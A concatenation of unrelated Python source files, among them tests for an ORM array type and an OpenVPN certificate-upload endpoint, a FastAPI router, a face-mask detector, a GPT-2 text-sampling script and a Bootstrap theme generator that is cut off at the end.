] | [((287, 312), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (293, 312), False, 'import attr\n'), ((4837, 4862), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (4843, 4862), False, 'import attr\n'), ((5322, 5347), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (5328, 5347), False, 'import attr\n'), ((6033, 6058), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (6039, 6058), False, 'import attr\n'), ((6309, 6334), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (6315, 6334), False, 'import attr\n'), ((6616, 6641), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (6622, 6641), False, 'import attr\n'), ((2875, 2898), 'numpy.random.RandomState', 'np.random.RandomState', ([], {}), '()\n', (2896, 2898), True, 'import numpy as np\n'), ((5118, 5144), 'numpy.random.randint', 'np.random.randint', (['(0)', '(2000)'], {}), '(0, 2000)\n', (5135, 5144), True, 'import numpy as np\n'), ((5852, 5891), 'numpy.array', 'np.array', (['self.bounds'], {'dtype': 'np.float64'}), '(self.bounds, dtype=np.float64)\n', (5860, 5891), True, 'import numpy as np\n'), ((9796, 9818), 'numpy.argmin', 'np.argmin', (['champions_f'], {}), '(champions_f)\n', (9805, 9818), True, 'import numpy as np\n'), ((10008, 10141), 'pygmo.archipelago', 'pg.archipelago', ([], {'n': 'number_of_islands', 'algo': 'algorithm', 'prob': 'problem', 'pop_size': 'self.solver_args.popsize', 'seed': 'self.solver_args.seed'}), '(n=number_of_islands, algo=algorithm, prob=problem, pop_size=\n self.solver_args.popsize, seed=self.solver_args.seed)\n', (10022, 10141), True, 'import pygmo as pg\n'), ((10677, 10768), 'pygmo.population', 'pg.population', ([], {'prob': 'problem', 'size': 'self.solver_args.popsize', 'seed': 'self.solver_args.seed'}), '(prob=problem, size=self.solver_args.popsize, seed=self.\n solver_args.seed)\n', (10690, 10768), True, 'import pygmo as pg\n'), ((10965, 11005), 'pygmo.nlopt', 'pg.nlopt', (['self.solver_args.polish_method'], {}), '(self.solver_args.polish_method)\n', (10973, 11005), True, 'import pygmo as pg\n'), ((11032, 11065), 'pygmo.algorithm', 'pg.algorithm', (['pygmo_nlopt_wrapper'], {}), '(pygmo_nlopt_wrapper)\n', (11044, 11065), True, 'import pygmo as pg\n'), ((3636, 3659), 'numpy.array', 'np.array', (['self.mutation'], {}), '(self.mutation)\n', (3644, 3659), True, 'import numpy as np\n'), ((7463, 7870), 'scipy.optimize.differential_evolution', 'differential_evolution', (['self.objective_function'], {'bounds': 'self.bounds', 'args': 'self.args', 'strategy': 'self.solver_args.strategy', 'popsize': 'self.solver_args.popsize', 'recombination': 'self.solver_args.recombination', 'mutation': 'self.solver_args.mutation', 'tol': 'self.solver_args.tol', 'disp': 'self.solver_args.disp', 'polish': 'self.solver_args.polish', 'seed': 'self.solver_args.seed', 'workers': 'self.solver_args.workers'}), '(self.objective_function, bounds=self.bounds, args=\n self.args, strategy=self.solver_args.strategy, popsize=self.solver_args\n .popsize, recombination=self.solver_args.recombination, mutation=self.\n solver_args.mutation, tol=self.solver_args.tol, disp=self.solver_args.\n disp, polish=self.solver_args.polish, seed=self.solver_args.seed,\n workers=self.solver_args.workers)\n', (7485, 7870), False, 'from scipy.optimize import differential_evolution\n'), ((8868, 8895), 'pygmo.problem', 'pg.problem', (['problem_wrapper'], {}), '(problem_wrapper)\n', (8878, 8895), True, 'import pygmo as pg\n'), ((8418, 8682), 'pygmo.de1220', 'pg.de1220', ([], {'gen': 'self.solver_args.gen', 'allowed_variants': 'self.solver_args.allowed_variants', 'variant_adptv': 'self.solver_args.variant_adptv', 'ftol': 'self.solver_args.ftol', 'xtol': 'self.solver_args.xtol', 'memory': 'self.solver_args.memory', 'seed': 'self.solver_args.seed'}), '(gen=self.solver_args.gen, allowed_variants=self.solver_args.\n allowed_variants, variant_adptv=self.solver_args.variant_adptv, ftol=\n self.solver_args.ftol, xtol=self.solver_args.xtol, memory=self.\n solver_args.memory, seed=self.solver_args.seed)\n', (8427, 8682), True, 'import pygmo as pg\n')] |
# MIT License
#
# Copyright (c) 2021 TrigonDev
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pytest
from apgorm.types import Array, Int # for subtypes
@pytest.mark.parametrize("subtype", [Int(), Array(Int()), Array(Array(Int()))])
def test_array_init(subtype):
a = Array(subtype)
assert a.subtype is subtype
def test_array_sql():
assert Array(Int())._sql == "INTEGER[]"
assert Array(Array(Int()))._sql == "INTEGER[][]"
| [
"apgorm.types.Int",
"apgorm.types.Array"
] | [((1292, 1306), 'apgorm.types.Array', 'Array', (['subtype'], {}), '(subtype)\n', (1297, 1306), False, 'from apgorm.types import Array, Int\n'), ((1211, 1216), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1214, 1216), False, 'from apgorm.types import Array, Int\n'), ((1224, 1229), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1227, 1229), False, 'from apgorm.types import Array, Int\n'), ((1244, 1249), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1247, 1249), False, 'from apgorm.types import Array, Int\n'), ((1381, 1386), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1384, 1386), False, 'from apgorm.types import Array, Int\n'), ((1431, 1436), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1434, 1436), False, 'from apgorm.types import Array, Int\n')] |
from fastapi import FastAPI
from vogue.api.api_v1.endpoints import (
insert_documents,
home,
common_trends,
sequencing,
genootype,
reagent_labels,
prepps,
bioinfo_covid,
bioinfo_micro,
bioinfo_mip,
update,
)
from vogue.settings import static_files
app = FastAPI()
app.mount(
"/static",
static_files,
name="static",
)
app.include_router(home.router, tags=["home"])
app.include_router(common_trends.router, tags=["common_trends"])
app.include_router(sequencing.router, tags=["sequencing"])
app.include_router(genootype.router, tags=["genotype"])
app.include_router(reagent_labels.router, tags=["index"])
app.include_router(prepps.router, tags=["preps"])
app.include_router(bioinfo_micro.router, tags=["bioinfo_micro"])
app.include_router(bioinfo_covid.router, tags=["bioinfo_covid"])
app.include_router(bioinfo_mip.router, tags=["bioinfo_mip"])
app.include_router(update.router, tags=["update"])
app.include_router(insert_documents.router, tags=["sample"])
| [
"fastapi.FastAPI"
] | [((301, 310), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (308, 310), False, 'from fastapi import FastAPI\n')] |
import torch.nn as nn
import torch.nn.functional as F
from dgcnn.pytorch.model import DGCNN as DGCNN_original
from all_utils import DATASET_NUM_CLASS
class DGCNN(nn.Module):
def __init__(self, task, dataset):
super().__init__()
self.task = task
self.dataset = dataset
if task == "cls":
num_classes = DATASET_NUM_CLASS[dataset]
# default arguments
class Args:
def __init__(self):
self.k = 20
self.emb_dims = 1024
self.dropout = 0.5
self.leaky_relu = 1
args = Args()
self.model = DGCNN_original(args, output_channels=num_classes)
else:
assert False
def forward(self, pc, cls=None):
pc = pc.to(next(self.parameters()).device)
pc = pc.permute(0, 2, 1).contiguous()
if self.task == 'cls':
assert cls is None
logit = self.model(pc)
out = {'logit': logit}
else:
assert False
return out
| [
"dgcnn.pytorch.model.DGCNN"
] | [((674, 723), 'dgcnn.pytorch.model.DGCNN', 'DGCNN_original', (['args'], {'output_channels': 'num_classes'}), '(args, output_channels=num_classes)\n', (688, 723), True, 'from dgcnn.pytorch.model import DGCNN as DGCNN_original\n')] |
from collections import deque
N, K = map(int, input().split())
T = [int(input()) for _ in range(N)]
ans_dq = deque([0, 0, 0])
for i, t in enumerate(T):
ans_dq.append(t)
ans_dq.popleft()
if sum(ans_dq) < K and i > 1:
print(i + 1)
break
else:
print(-1)
| [
"collections.deque"
] | [((109, 125), 'collections.deque', 'deque', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (114, 125), False, 'from collections import deque\n')] |
import cv2
import tensorflow as tf
from tensorflow import keras
import matplotlib.pyplot as plt
import numpy as np
model = "./AI_Mask_Detector/res10_300x300_ssd_iter_140000_fp16.caffemodel"
config = "./AI_Mask_Detector/deploy.prototxt"
# model = './AI_Mask_Detector/opencv_face_detector_uint8.pb'
# config = './AI_Mask_Detector/opencv_face_detector.pbtxt'
mask_model = tf.keras.models.load_model("./AI_Mask_Detector/model.h5")
probability_model = tf.keras.Sequential([mask_model])
width = 64
height = 64
# cap = cv2.VideoCapture(0)
cap = cv2.VideoCapture("./AI_Mask_Detector/demoVideo/test2.mp4")
if not cap.isOpened():
print("Camera open failed!")
exit()
net = cv2.dnn.readNet(model, config)
if net.empty():
print("Net open failed!")
exit()
categories = ["mask", "none"]
print("len(categories) = ", len(categories))
while True:
ret, frame = cap.read()
if ret:
img = cv2.cvtColor(frame, code=cv2.COLOR_BGR2RGB)
blob = cv2.dnn.blobFromImage(img, 1, (300, 300), (104, 177, 123))
net.setInput(blob)
detect = net.forward()
detect = detect[0, 0, :, :]
(h, w) = frame.shape[:2]
# print('--------------------------')
for i in range(detect.shape[0]):
confidence = detect[i, 2]
if confidence < 0.4:
break
x1 = int(detect[i, 3] * w)
y1 = int(detect[i, 4] * h)
x2 = int(detect[i, 5] * w)
y2 = int(detect[i, 6] * h)
# cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0))
margin = 0
face = img[y1 - margin : y2 + margin, x1 - margin : x2 + margin]
resize = cv2.resize(face, (width, height))
# print(x1, y1, x2, y2, width, height)
# cv2.imshow("frame1", resize)
# np_image_data = np.asarray(inp)
rgb_tensor = tf.convert_to_tensor(resize, dtype=tf.float32)
rgb_tensor /= 255.0
rgb_tensor = tf.expand_dims(rgb_tensor, 0)
# 예측
predictions = probability_model.predict(rgb_tensor)
# print(categories[predictions[i][1]], ' ' , np.argmax(predictions[i]))
# lebel = categories[predictions[i]]
if predictions[0][0] > predictions[0][1]: # and predictions[0][0] > 0.7:
label = "Mask " + str(predictions[0][0])
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0))
cv2.putText(
frame,
label,
(x1, y1 - 1),
cv2.FONT_HERSHEY_SIMPLEX,
0.5,
(0, 255, 0),
1,
cv2.LINE_AA,
)
if predictions[0][0] < predictions[0][1]: # and predictions[0][1] > 0.7:
label = "No Mask " + str(predictions[0][1])
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255))
cv2.putText(
frame,
label,
(x1, y1 - 1),
cv2.FONT_HERSHEY_SIMPLEX,
0.5,
(0, 0, 255),
1,
cv2.LINE_AA,
)
# print(predictions[0][0], ' ', predictions[0][1])
cv2.imshow("frame", frame)
if cv2.waitKey(30) == 27:
break
else:
print("error")
cap.release()
cv2.destroyAllWindows()
| [
"cv2.dnn.blobFromImage",
"cv2.rectangle",
"tensorflow.keras.Sequential",
"cv2.imshow",
"cv2.putText",
"cv2.destroyAllWindows",
"tensorflow.keras.models.load_model",
"cv2.VideoCapture",
"cv2.cvtColor",
"tensorflow.convert_to_tensor",
"tensorflow.expand_dims",
"cv2.resize",
"cv2.waitKey",
"c... | [((371, 428), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['"""./AI_Mask_Detector/model.h5"""'], {}), "('./AI_Mask_Detector/model.h5')\n", (397, 428), True, 'import tensorflow as tf\n'), ((449, 482), 'tensorflow.keras.Sequential', 'tf.keras.Sequential', (['[mask_model]'], {}), '([mask_model])\n', (468, 482), True, 'import tensorflow as tf\n'), ((541, 599), 'cv2.VideoCapture', 'cv2.VideoCapture', (['"""./AI_Mask_Detector/demoVideo/test2.mp4"""'], {}), "('./AI_Mask_Detector/demoVideo/test2.mp4')\n", (557, 599), False, 'import cv2\n'), ((675, 705), 'cv2.dnn.readNet', 'cv2.dnn.readNet', (['model', 'config'], {}), '(model, config)\n', (690, 705), False, 'import cv2\n'), ((3461, 3484), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3482, 3484), False, 'import cv2\n'), ((908, 951), 'cv2.cvtColor', 'cv2.cvtColor', (['frame'], {'code': 'cv2.COLOR_BGR2RGB'}), '(frame, code=cv2.COLOR_BGR2RGB)\n', (920, 951), False, 'import cv2\n'), ((967, 1025), 'cv2.dnn.blobFromImage', 'cv2.dnn.blobFromImage', (['img', '(1)', '(300, 300)', '(104, 177, 123)'], {}), '(img, 1, (300, 300), (104, 177, 123))\n', (988, 1025), False, 'import cv2\n'), ((3332, 3358), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'frame'], {}), "('frame', frame)\n", (3342, 3358), False, 'import cv2\n'), ((1684, 1717), 'cv2.resize', 'cv2.resize', (['face', '(width, height)'], {}), '(face, (width, height))\n', (1694, 1717), False, 'import cv2\n'), ((1885, 1931), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['resize'], {'dtype': 'tf.float32'}), '(resize, dtype=tf.float32)\n', (1905, 1931), True, 'import tensorflow as tf\n'), ((1989, 2018), 'tensorflow.expand_dims', 'tf.expand_dims', (['rgb_tensor', '(0)'], {}), '(rgb_tensor, 0)\n', (2003, 2018), True, 'import tensorflow as tf\n'), ((3371, 3386), 'cv2.waitKey', 'cv2.waitKey', (['(30)'], {}), '(30)\n', (3382, 3386), False, 'import cv2\n'), ((2396, 2449), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x1, y1)', '(x2, y2)', '(0, 255, 0)'], {}), '(frame, (x1, y1), (x2, y2), (0, 255, 0))\n', (2409, 2449), False, 'import cv2\n'), ((2466, 2570), 'cv2.putText', 'cv2.putText', (['frame', 'label', '(x1, y1 - 1)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.5)', '(0, 255, 0)', '(1)', 'cv2.LINE_AA'], {}), '(frame, label, (x1, y1 - 1), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, \n 255, 0), 1, cv2.LINE_AA)\n', (2477, 2570), False, 'import cv2\n'), ((2908, 2961), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x1, y1)', '(x2, y2)', '(0, 0, 255)'], {}), '(frame, (x1, y1), (x2, y2), (0, 0, 255))\n', (2921, 2961), False, 'import cv2\n'), ((2978, 3082), 'cv2.putText', 'cv2.putText', (['frame', 'label', '(x1, y1 - 1)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.5)', '(0, 0, 255)', '(1)', 'cv2.LINE_AA'], {}), '(frame, label, (x1, y1 - 1), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, \n 0, 255), 1, cv2.LINE_AA)\n', (2989, 3082), False, 'import cv2\n')] |
# services/ovpn_server/project/tests/test_ovpn_server.py
import os
import json
import io
from flask import current_app
from project.tests.base import BaseTestCase
class TestOvpnServer(BaseTestCase):
def test_certificates(self):
with self.client:
pki_path = current_app.config['PKI_PATH']
token = current_app.config['SECRET_KEY']
response = self.client.post(
'/cert/upload',
data={
'file': (io.BytesIO(b'test'), 'test_cert.req'),
'cert': 'False'
},
content_type='multipart/form-data',
headers={'Authorization': f'Bearer {token}'}
)
data = json.loads(response.data.decode())
self.assertIn('file uploaded', data['message'])
self.assertEqual(response.status_code, 200)
self.assertTrue(os.path.isfile(f'{pki_path}/reqs/test_cert.req'))
os.remove(f'{pki_path}/reqs/test_cert.req')
self.assertFalse(os.path.isfile(f'{pki_path}/reqs/test_cert.req'))
def test_certificates_invalid_token(self):
with self.client:
filename = 'test_cert.crt'
token = "INVALID_TOKEN"
response = self.client.post(
'/cert/upload',
data={'file': (io.BytesIO(b'test'), filename)},
headers={'Authorization': f'Bearer {token}'}
)
data = json.loads(response.data.decode())
self.assertIn(f'Provide a valid auth token', data['message'])
self.assertEqual(response.status_code, 401)
def test_certificates_no_token(self):
with self.client:
filename = 'test_cert.crt'
response = self.client.post(
'/cert/upload',
data={'file': (io.BytesIO(b'test'), filename)},
)
data = json.loads(response.data.decode())
self.assertIn(f'Provide a valid auth token', data['message'])
self.assertEqual(response.status_code, 403)
def test_certificate_no_file(self):
"""
Tests response when there is no file being sent
"""
with self.client:
token = current_app.config['SECRET_KEY']
response = self.client.post(
'/cert/upload',
data={},
headers={'Authorization': f'Bearer {token}'}
)
data = json.loads(response.data.decode())
self.assertIn('No file', data['message'])
self.assertEqual(response.status_code, 400)
def test_certificates_invalid_file(self):
"""
Tests response when an invalid file is sent
"""
with self.client:
token = current_app.config['SECRET_KEY']
response = self.client.post(
'/cert/upload',
data={'file': (io.BytesIO(str.encode('test')), 'test.txt')},
headers={'Authorization': f'Bearer {token}'}
)
data = json.loads(response.data.decode())
self.assertIn('Not a valid file', data['message'])
self.assertEqual(response.status_code, 400)
| [
"os.path.isfile",
"io.BytesIO",
"os.remove"
] | [((977, 1020), 'os.remove', 'os.remove', (['f"""{pki_path}/reqs/test_cert.req"""'], {}), "(f'{pki_path}/reqs/test_cert.req')\n", (986, 1020), False, 'import os\n'), ((915, 963), 'os.path.isfile', 'os.path.isfile', (['f"""{pki_path}/reqs/test_cert.req"""'], {}), "(f'{pki_path}/reqs/test_cert.req')\n", (929, 963), False, 'import os\n'), ((1050, 1098), 'os.path.isfile', 'os.path.isfile', (['f"""{pki_path}/reqs/test_cert.req"""'], {}), "(f'{pki_path}/reqs/test_cert.req')\n", (1064, 1098), False, 'import os\n'), ((496, 515), 'io.BytesIO', 'io.BytesIO', (["b'test'"], {}), "(b'test')\n", (506, 515), False, 'import io\n'), ((1353, 1372), 'io.BytesIO', 'io.BytesIO', (["b'test'"], {}), "(b'test')\n", (1363, 1372), False, 'import io\n'), ((1857, 1876), 'io.BytesIO', 'io.BytesIO', (["b'test'"], {}), "(b'test')\n", (1867, 1876), False, 'import io\n')] |
# encoding: utf-8
from web.ext.acl import when
from ..templates.admin.admintemplate import page as _page
from ..templates.admin.requests import requeststemplate, requestrow
from ..templates.requests import requestrow as rr
from ..send_update import send_update
import cinje
@when(when.matches(True, 'session.authenticated', True), when.never)
class Admin:
__dispatch__ = 'resource'
__resource__ = 'admin'
from .suggestions import Suggestions as suggestions
from .mistags import Mistags as mistags
from .auth import Auth as auth
from .logout import Logout as logout
from .showinfo import ShowInfo as showinfo
from .requestoptions import RequestOptions as requestoptions
from .catalogoptions import CatalogOptions as catalogoptions
from .uploadfiles import UploadFiles as uploadfiles
from .updatedatabase import UpdateDatabase as updatedatabase
from .changepw import ChangePassword as changepw
from .showhistory import ShowHistory as showhistory
from .restoredatabase import RestoreDatabase as restoredatabase, CurrentProgress as currentprogress
from .updatehistory import UpdateHistory as updatehistory
def __init__(self, context, name, *arg, **args):
self._name = name
self._ctx = context
self.queries = context.queries
def get(self, *arg, **args):
if len(arg) > 0 and arg[0] != 'requests':
return "Page not found: {}".format(arg[0])
if 'view_status' not in args:
args['view_status'] = 'New/Pending'
if 'change_status' in args:
changed_row = self.queries.change_request_status(args['id'], args['status'])
try:
request_row = cinje.flatten(rr(changed_row))
except:
request_row = '' # Row was deleted
np_info = self.queries.get_requests_info(status=args['view_status'])
send_update(self._ctx.websocket, requestbutton=np_info.request_count, request_row=request_row, new_request_status=args['status'], request_id=args['id']) # Update the request count button
send_update(self._ctx.websocket_admin, requestbutton=np_info.request_count) # Update the request count button
requestlist = self.queries.get_requests(status=args['view_status'])
try:
requestinfo = np_info
except:
requestinfo = self.queries.get_requests_info(status=args['view_status'])
return requeststemplate(_page, "Requests", self._ctx, requestlist=requestlist, view_status=args['view_status'], requestinfo=requestinfo)
| [
"web.ext.acl.when.matches"
] | [((282, 331), 'web.ext.acl.when.matches', 'when.matches', (['(True)', '"""session.authenticated"""', '(True)'], {}), "(True, 'session.authenticated', True)\n", (294, 331), False, 'from web.ext.acl import when\n')] |
from unittest import TestCase
from day10 import KnotHasher
class TestKnotHasher(TestCase):
def test_calc(self):
sut = KnotHasher(5, [3, 4, 1, 5])
self.assertEqual(12, sut.calc())
def test_hash1(self):
sut = KnotHasher(256, '')
self.assertEqual('a2582a3a0e66e6e86e3812dcb672a272', sut.hash())
def test_hash2(self):
sut = KnotHasher(256, 'AoC 2017')
self.assertEqual('33efeb34ea91902bb2f59c9920caa6cd', sut.hash())
def test_hash3(self):
sut = KnotHasher(256, '1,2,3')
self.assertEqual('3efbe78a8d82f29979031a4aa0b16a9d', sut.hash())
def test_hash4(self):
sut = KnotHasher(256, '1,2,4')
self.assertEqual('63960835bcdc130f0b66d7ff4f6a5a8e', sut.hash())
| [
"day10.KnotHasher"
] | [((132, 159), 'day10.KnotHasher', 'KnotHasher', (['(5)', '[3, 4, 1, 5]'], {}), '(5, [3, 4, 1, 5])\n', (142, 159), False, 'from day10 import KnotHasher\n'), ((242, 261), 'day10.KnotHasher', 'KnotHasher', (['(256)', '""""""'], {}), "(256, '')\n", (252, 261), False, 'from day10 import KnotHasher\n'), ((376, 403), 'day10.KnotHasher', 'KnotHasher', (['(256)', '"""AoC 2017"""'], {}), "(256, 'AoC 2017')\n", (386, 403), False, 'from day10 import KnotHasher\n'), ((518, 542), 'day10.KnotHasher', 'KnotHasher', (['(256)', '"""1,2,3"""'], {}), "(256, '1,2,3')\n", (528, 542), False, 'from day10 import KnotHasher\n'), ((657, 681), 'day10.KnotHasher', 'KnotHasher', (['(256)', '"""1,2,4"""'], {}), "(256, '1,2,4')\n", (667, 681), False, 'from day10 import KnotHasher\n')] |
#!/usr/bin/env python3
import fire
import json
import os
import numpy as np
import tensorflow as tf
import model, sample, encoder
def interact_model(
model_name='117M',
seed=None,
nsamples=1000,
batch_size=1,
length=None,
temperature=1,
top_k=0,
top_p=0.0
):
"""
Interactively run the model
:model_name=117M : String, which model to use
:seed=None : Integer seed for random number generators, fix seed to reproduce
results
:nsamples=1 : Number of samples to return total
:batch_size=1 : Number of batches (only affects speed/memory). Must divide nsamples.
:length=None : Number of tokens in generated text, if None (default), is
determined by model hyperparameters
:temperature=1 : Float value controlling randomness in boltzmann
distribution. Lower temperature results in less random completions. As the
temperature approaches zero, the model will become deterministic and
repetitive. Higher temperature results in more random completions.
:top_k=0 : Integer value controlling diversity. 1 means only 1 word is
considered for each step (token), resulting in deterministic completions,
while 40 means 40 words are considered at each step. 0 (default) is a
special setting meaning no restrictions. 40 generally is a good value.
:top_p=0.0 : Float value controlling diversity. Implements nucleus sampling,
overriding top_k if set to a value > 0. A good setting is 0.9.
"""
if batch_size is None:
batch_size = 1
assert nsamples % batch_size == 0
enc = encoder.get_encoder(model_name)
hparams = model.default_hparams()
with open(os.path.join('models', model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
if length is None:
length = hparams.n_ctx // 2
print(length)
#elif length > hparams.n_ctx:
# raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
#config = tf.ConfigProto(device_count={'GPU': 0})
config = tf.ConfigProto()
with tf.Session(graph=tf.Graph(),config=config) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
raw_text = """Model {"""
#input("Model prompt >>> ")
context_tokens = enc.encode(raw_text)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join('models', model_name))
saver.restore(sess, ckpt)
from datetime import datetime
#while True:
generated = 0
import time
grand_start = time.time()
for cnt in range(nsamples // batch_size):
start_per_sample = time.time()
output_text = raw_text
text = raw_text
context_tokens = enc.encode(text)
#raw_text = input("Model prompt >>> ")
# while not raw_text:
# print('Prompt should not be empty!')
# raw_text = input("Model prompt >>> ")
#print(context_tokens)
#file_to_save.write(raw_text)
#for cnt in range(nsamples // batch_size):
while "<|endoftext|>" not in text:
out = sess.run(output, feed_dict={context: [context_tokens for _ in range(batch_size)]})[:,
len(context_tokens):]
for i in range(batch_size):
#generated += 1
text = enc.decode(out[i])
if "<|endoftext|>" in text:
sep = "<|endoftext|>"
rest = text.split(sep, 1)[0]
output_text += rest
break
context_tokens = enc.encode(text)
output_text += text
print("=" * 40 + " SAMPLE " + str(cnt+12) + " " + "=" * 40)
minutes, seconds = divmod(time.time() - start_per_sample, 60)
print("Output Done : {:0>2}:{:05.2f}".format(int(minutes),seconds) )
print("=" * 80)
with open("Simulink_sample/sample__"+str(cnt+12)+".mdl","w+") as f:
f.write(output_text)
elapsed_total = time.time()-grand_start
hours, rem = divmod(elapsed_total,3600)
minutes, seconds = divmod(rem, 60)
print("Total time to generate 1000 samples :{:0>2}:{:0>2}:{:05.2f}".format(int(hours),int(minutes),seconds))
if __name__ == '__main__':
fire.Fire(interact_model)
| [
"tensorflow.Graph",
"encoder.get_encoder",
"fire.Fire",
"tensorflow.placeholder",
"tensorflow.train.Saver",
"os.path.join",
"sample.sample_sequence",
"model.default_hparams",
"numpy.random.seed",
"json.load",
"tensorflow.ConfigProto",
"tensorflow.set_random_seed",
"time.time"
] | [((1595, 1626), 'encoder.get_encoder', 'encoder.get_encoder', (['model_name'], {}), '(model_name)\n', (1614, 1626), False, 'import model, sample, encoder\n'), ((1641, 1664), 'model.default_hparams', 'model.default_hparams', ([], {}), '()\n', (1662, 1664), False, 'import model, sample, encoder\n'), ((2059, 2075), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (2073, 2075), True, 'import tensorflow as tf\n'), ((4691, 4716), 'fire.Fire', 'fire.Fire', (['interact_model'], {}), '(interact_model)\n', (4700, 4716), False, 'import fire\n'), ((2155, 2199), 'tensorflow.placeholder', 'tf.placeholder', (['tf.int32', '[batch_size, None]'], {}), '(tf.int32, [batch_size, None])\n', (2169, 2199), True, 'import tensorflow as tf\n'), ((2208, 2228), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (2222, 2228), True, 'import numpy as np\n'), ((2237, 2261), 'tensorflow.set_random_seed', 'tf.set_random_seed', (['seed'], {}), '(seed)\n', (2255, 2261), True, 'import tensorflow as tf\n'), ((2405, 2554), 'sample.sample_sequence', 'sample.sample_sequence', ([], {'hparams': 'hparams', 'length': 'length', 'context': 'context', 'batch_size': 'batch_size', 'temperature': 'temperature', 'top_k': 'top_k', 'top_p': 'top_p'}), '(hparams=hparams, length=length, context=context,\n batch_size=batch_size, temperature=temperature, top_k=top_k, top_p=top_p)\n', (2427, 2554), False, 'import model, sample, encoder\n'), ((2626, 2642), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (2640, 2642), True, 'import tensorflow as tf\n'), ((2878, 2889), 'time.time', 'time.time', ([], {}), '()\n', (2887, 2889), False, 'import time\n'), ((1679, 1729), 'os.path.join', 'os.path.join', (['"""models"""', 'model_name', '"""hparams.json"""'], {}), "('models', model_name, 'hparams.json')\n", (1691, 1729), False, 'import os\n'), ((1772, 1784), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1781, 1784), False, 'import json\n'), ((2685, 2719), 'os.path.join', 'os.path.join', (['"""models"""', 'model_name'], {}), "('models', model_name)\n", (2697, 2719), False, 'import os\n'), ((2971, 2982), 'time.time', 'time.time', ([], {}), '()\n', (2980, 2982), False, 'import time\n'), ((4428, 4439), 'time.time', 'time.time', ([], {}), '()\n', (4437, 4439), False, 'import time\n'), ((2102, 2112), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2110, 2112), True, 'import tensorflow as tf\n'), ((4142, 4153), 'time.time', 'time.time', ([], {}), '()\n', (4151, 4153), False, 'import time\n')] |
import saludos
saludos.saludar() | [
"saludos.saludar"
] | [((16, 33), 'saludos.saludar', 'saludos.saludar', ([], {}), '()\n', (31, 33), False, 'import saludos\n')] |
import re
import os
values = {
'uc': 'Vurple',
'lc': 'vurple',
'cl': '#116BB7',
}
def main():
infile = "yeti/variables.less"
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/variables.less"
f = open(outfile, 'w')
for line in lines:
line = re.sub('Yeti', values['uc'], line)
line = re.sub('yeti', values['lc'], line)
line = re.sub('#008cba', values['cl'], line)
line = re.sub('headings-font-family: @font-family-base', 'headings-font-family: @font-family-header-sans-serif', line)
if re.search("Open Sans", line):
line = re.sub('Open Sans', 'Lato', line)
line = '@font-family-header-sans-serif: "Orbitron", "Helvetica Neue", Helvetica, Arial, sans-serif;\n' + line
f.write(line)
f.close()
infile = "yeti/bootswatch.less"
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/bootswatch.less"
f = open(outfile, 'w')
for line in lines:
line = re.sub('Yeti', values['uc'], line)
if re.search("Open\+Sans", line):
continue
if re.search("web-font-path", line):
line = '@web-font-path2: "https://fonts.googleapis.com/css?family=Lato:400,700,400italic";\n' + line
line = '@web-font-path: "https://fonts.googleapis.com/css?family=Orbitron:300italic,400italic,700italic,400,300,700";\n' + line
line = line + '.web-font(@web-font-path2);\n'
f.write(line)
f.close()
infile = "yeti/index.html"
